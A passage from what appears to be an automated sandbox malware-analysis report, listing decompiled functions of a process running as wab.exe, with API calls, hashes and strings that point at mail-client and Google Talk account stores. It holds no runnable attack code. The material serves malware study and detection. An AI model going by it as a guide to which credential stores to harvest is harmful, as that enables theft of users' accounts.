                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004437D7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                          • Store Root, xrefs: 00443892
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                                                                                                          • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                          • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040EDD5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 328 40efdf-40efea call 404780 318->328 329 40ef8f-40efb3 call 4047a0 318->329 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 330 40f036-40f044 322->330 328->320 329->328 335 40efb5-40efb8 329->335 330->315 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->328 337->336
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                                                                                                          • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                          • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004037BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                          • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                                          • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                          • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004034D6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                                                                                                          • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                          • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C9F7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                                          • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                          • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408344 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408392
                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                          • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                          • API String ID: 2959138223-1079885057
                                                                                                                                                                                                          • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                          • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B783 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 420 40b810-40b81c 412->420 421 40b855-40b864 SetCursor 412->421 419 40b7d0-40b7d1 call 40b340 417->419 418->419 419->410 423 40b833-40b852 qsort 420->423 424 40b81e-40b829 420->424 423->421 424->423 427->412 428->412 429->412 430->412 431->412
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                                                                                                          • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                          • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041072B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 458 41074f-410752 448->458 459 41075e-410761 448->459 450 410797-4107a5 449->450 451 41078d-410790 449->451 454 4107b5-4107bf call 410411 450->454 451->450 453 410792-410795 451->453 453->450 456 4107a7-4107b0 453->456 463 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 454->463 464 4107ef-410802 _mbscpy 454->464 456->454 458->449 461 410754-410757 458->461 462 410768 459->462 461->449 465 410759-41075c 461->465 466 410805-410807 462->466 463->464 464->466 465->449 465->459
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410780
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                                          • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                          • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004105DD Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                          • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                          • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410344 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                                          • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                                          • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                          • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408AA5 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                          • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                          • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406CCE Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                                          • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                          • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406E26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
